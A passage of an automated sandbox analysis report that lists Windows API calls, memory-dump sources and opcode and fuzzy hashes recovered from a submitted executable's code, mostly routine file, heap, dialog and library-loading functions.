                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2838827086-0
                                                                                    • Opcode ID: 88eca5124a952619d90a00d068f10e8fd7c6cee2eee23f8ae32bee879e823fcb
                                                                                    • Instruction ID: e5c9adad6ff5dd0153a5b92cc96599982bf1690653ebffbaffdfee554a6e74f8
                                                                                    • Opcode Fuzzy Hash: 88eca5124a952619d90a00d068f10e8fd7c6cee2eee23f8ae32bee879e823fcb
                                                                                    • Instruction Fuzzy Hash: 92312C7190410A9FEF16DF98C944AEEBBF5BF58304F10009DE585A7290C7369E15CB60
                                                                                    APIs
                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,010073BC,?,?,?,00000000), ref: 01009DBC
                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 01009E70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$BuffersFlushTime
                                                                                    • String ID:
                                                                                    • API String ID: 1392018926-0
                                                                                    • Opcode ID: bade3f7d09595feb4d651d055fca35b75c8d505236ca0e14f2f20f72c9aab3b7
                                                                                    • Instruction ID: 9d7a2f22e67313912af0d7f27b090b44b064072031fe6cfd9ec0339a49277ed1
                                                                                    • Opcode Fuzzy Hash: bade3f7d09595feb4d651d055fca35b75c8d505236ca0e14f2f20f72c9aab3b7
                                                                                    • Instruction Fuzzy Hash: 602128312882869FE716DF38C491AABBFE8AF51308F08495DF5C987182D339D90DCB61
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,01009F27,?,?,0100771A), ref: 010096E6
                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,01009F27,?,?,0100771A), ref: 01009716
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: ad665fde2b961dcbed20d6093c84885532f6ab280d4c4360eba7bd52c49c80f8
                                                                                    • Instruction ID: afe85808430fbd69eac987090d6ecf19bd39f063ff70a4f5062835919f52a8bd
                                                                                    • Opcode Fuzzy Hash: ad665fde2b961dcbed20d6093c84885532f6ab280d4c4360eba7bd52c49c80f8
                                                                                    • Instruction Fuzzy Hash: 5221B0715043446FF3718A69CC88BE7B7DCEB49328F000A19FADAC65C6C778A884C631
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 01009EC7
                                                                                    • GetLastError.KERNEL32 ref: 01009ED4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 2976181284-0
                                                                                    • Opcode ID: 33df4dcb73bf073ea9ce1491ce19c303f41a8deafb2eae274c87834fbd6fefd5
                                                                                    • Instruction ID: eebab815987d1a6cb08529afbc0710887e3d1c3d3ade0c4db6194a97a0a7c768
                                                                                    • Opcode Fuzzy Hash: 33df4dcb73bf073ea9ce1491ce19c303f41a8deafb2eae274c87834fbd6fefd5
                                                                                    • Instruction Fuzzy Hash: F31129306007009BF736C628C884BA6B7E9AB44324F50066AE1D7D25D2D371FD45C760
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 01028E75
                                                                                      • Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38
                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,01041098,010017CE,?,?,00000007,?,?,?,010013D6,?,00000000), ref: 01028EB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                    • String ID:
                                                                                    • API String ID: 2447670028-0
                                                                                    • Opcode ID: bb4731e157eca8a701435b57eacaa52b2d4652227c9e598b24c75b8b98a131a5
                                                                                    • Instruction ID: 720aae6f796c395268371445326ddd5f49e266975745dca50c8381c85006ceac
                                                                                    • Opcode Fuzzy Hash: bb4731e157eca8a701435b57eacaa52b2d4652227c9e598b24c75b8b98a131a5
                                                                                    • Instruction Fuzzy Hash: 28F0F63A60113666EF712A299C04BAF3BDC8FD1B70F14C167E9D4AB1A0DB71D80082A1
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 010110AB
                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 010110B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                    • String ID:
                                                                                    • API String ID: 1231390398-0
                                                                                    • Opcode ID: 05d9fd3bc10528cc2170b2f293db859956406324a52c58f6d42e6508cd0021ca
                                                                                    • Instruction ID: 21b0b98479194364472a30493d2ee0ad574a45758da9e8ffa8ad674cd6026171
                                                                                    • Opcode Fuzzy Hash: 05d9fd3bc10528cc2170b2f293db859956406324a52c58f6d42e6508cd0021ca
                                                                                    • Instruction Fuzzy Hash: CDE09232F00145A78F1E86B898159EBB6DDEB4410431442B9F683D7109F9B9D90147A0
                                                                                    APIs
                                                                                      • Part of subcall function 0102BF30: GetEnvironmentStringsW.KERNEL32 ref: 0102BF39
                                                                                      • Part of subcall function 0102BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0102BF5C
                                                                                      • Part of subcall function 0102BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0102BF82
                                                                                      • Part of subcall function 0102BF30: _free.LIBCMT ref: 0102BF95
                                                                                      • Part of subcall function 0102BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0102BFA4
                                                                                    • _free.LIBCMT ref: 010282AE
                                                                                    • _free.LIBCMT ref: 010282B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                    • String ID:
                                                                                    • API String ID: 400815659-0
                                                                                    • Opcode ID: fba459acba99376df1d4e1976ead37d57e1a597a0620423939653dd8a5ac4f6c
                                                                                    • Instruction ID: 3c97a54aed901fa1a0f23f7f3e2d52c2adf7c9006e2f9c216540f98767613b3e
                                                                                    • Opcode Fuzzy Hash: fba459acba99376df1d4e1976ead37d57e1a597a0620423939653dd8a5ac4f6c
                                                                                    • Instruction Fuzzy Hash: 55E0222BA06D7351A2B2727E6C00BAF27C44FE2338B558647E9E0CB0D2CE58840A45A2
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
                                                                                      • Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2673547680-0
                                                                                    • Opcode ID: 3981b8e942d47e1fc791feeb0e2025e391a0b171498ab830953262a961cde0e0
                                                                                    • Instruction ID: dfecebb3c25db30f3a306a5fe564f37bbcbf9af66a54902cfd2954a1a09ce2ea
                                                                                    • Opcode Fuzzy Hash: 3981b8e942d47e1fc791feeb0e2025e391a0b171498ab830953262a961cde0e0
                                                                                    • Instruction Fuzzy Hash: DCF0A03220020EBBEF125E60DC80FDA37ACBF04386F448050B984D6194DB72DA94DB10
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641,000000FF), ref: 0100A1F1
                                                                                      • Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27
                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641), ref: 0100A21F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2643169976-0
                                                                                    • Opcode ID: ff633822faf26fdfbe114d0dfe6a66dc3e57c84a5a7003419afb3357a4bd90f8
                                                                                    • Instruction ID: 250eb872ac89ff47c26f0ed0e59c379980176d0260efe9afa50024a3bcd7ff0b
                                                                                    • Opcode Fuzzy Hash: ff633822faf26fdfbe114d0dfe6a66dc3e57c84a5a7003419afb3357a4bd90f8
                                                                                    • Instruction Fuzzy Hash: 86E09235240219BBEB125E64DC84FDA779CBF083C2F484061B984D6094EB66D984DB50
                                                                                    APIs
                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,01032641,000000FF), ref: 0101ACB0
                                                                                    • CoUninitialize.COMBASE(?,?,?,?,01032641,000000FF), ref: 0101ACB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 3856339756-0
                                                                                    • Opcode ID: 5d65e081cf25b41e507371366736eb8d8435e2e7a38e9bb9386b41592c260de3
                                                                                    • Instruction ID: 0c719d34694ec5a249f6c3af8ed90ed3625840bd0b588d3d89010c0fb862b74a
                                                                                    • Opcode Fuzzy Hash: 5d65e081cf25b41e507371366736eb8d8435e2e7a38e9bb9386b41592c260de3
                                                                                    • Instruction Fuzzy Hash: DAE06572604650EFC7119B59D845B49FBBCFB88E20F00426AE456D7764CB786800CB90
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0100A23A,?,0100755C,?,?,?,?), ref: 0100A254
                                                                                      • Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0100A23A,?,0100755C,?,?,?,?), ref: 0100A280
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2673547680-0
                                                                                    • Opcode ID: d506ce9ef93d1112ca1ea426ab9bc854445ec6cd9fde8a97fff88fbc75015032
                                                                                    • Instruction ID: 6c71e386091b5bdf15c179c71d1aff966f09c5afab805abd46f3b72d8e2a1d1d
                                                                                    • Opcode Fuzzy Hash: d506ce9ef93d1112ca1ea426ab9bc854445ec6cd9fde8a97fff88fbc75015032
                                                                                    • Instruction Fuzzy Hash: C1E092356001289BEB62AB68CC04BD9BB9CAB193E1F0442B1FEC4E71C4DA75DD44CBA0
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0101DEEC
                                                                                      • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0101DF03
                                                                                      • Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
                                                                                      • Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
                                                                                      • Part of subcall function 0101B568: IsDialogMessageW.USER32(00010442,?), ref: 0101B59E
                                                                                      • Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
                                                                                      • Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2718869927-0
                                                                                    • Opcode ID: 6817d6af9c810c2dc645fae0635eba249954b0896438fb3e609595c05cf60f6d
                                                                                    • Instruction ID: 1f5f3ccfaf945375bf1b625b4b1d4cacb1a305ed9fc8e4cfaa4704c6759713d9
                                                                                    • Opcode Fuzzy Hash: 6817d6af9c810c2dc645fae0635eba249954b0896438fb3e609595c05cf60f6d
                                                                                    • Instruction Fuzzy Hash: DAE022B640024837EF12ABA0DC05FDE3BAC5B14385F040C92B380EA0E2DA3DEA108760
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1175261203-0
                                                                                    • Opcode ID: b8ff588f83bcefe32b2e8a86c8eb4b863252442056528a764ec3133ff3e6958e
                                                                                    • Instruction ID: 22e2e2a25e81002e0623cd0a974ceeb2be398cfe2c0ac787b5441860d31de914
                                                                                    • Opcode Fuzzy Hash: b8ff588f83bcefe32b2e8a86c8eb4b863252442056528a764ec3133ff3e6958e
                                                                                    • Instruction Fuzzy Hash: 52E048765002186BDB11A694DC44FDABBACFF093D1F0400657AC5D2048D678D6C4CBB0
                                                                                    APIs
                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0101A3DA
                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0101A3E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                    • String ID:
                                                                                    • API String ID: 1918208029-0
                                                                                    • Opcode ID: 92cac2a2abdabfba8bf9abd42714168caeda2d99d1355161022609c332502b2c
                                                                                    • Instruction ID: 23d3827fdd94843ec17865931beb3aa99bafda72f3863520f4b14d8d68d07ee4
                                                                                    • Opcode Fuzzy Hash: 92cac2a2abdabfba8bf9abd42714168caeda2d99d1355161022609c332502b2c
                                                                                    • Instruction Fuzzy Hash: EFE0ED71501219EBDB51DF59C5407DEBBE8FB14260F10C05AA88697204E2B8AA04DBA1
                                                                                    APIs
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01022BAA
                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01022BB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                    • String ID:
                                                                                    • API String ID: 1660781231-0
                                                                                    • Opcode ID: 296d687e25b3eac56b7c1eee8460e4bde6a247174686651172ebe20533b67695
                                                                                    • Instruction ID: e7c785687a0f8a4355ed3da6b01cbf429825379159570fce305615d4bcd914ea
                                                                                    • Opcode Fuzzy Hash: 296d687e25b3eac56b7c1eee8460e4bde6a247174686651172ebe20533b67695
                                                                                    • Instruction Fuzzy Hash: 99D02234198332185C6B3EFA38065CD338ABD51B79BE003DEE8E08E8C1EE1990409211
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3351165006-0
                                                                                    • Opcode ID: 4dea4f6dd8437c3024cf362a5804e837f8c5d63531d52d70e999ee333440ed07
                                                                                    • Instruction ID: a782aa06b10ed4b03b03cbbc244e87ccace00316b49aae77fcd4b5e3ab742883
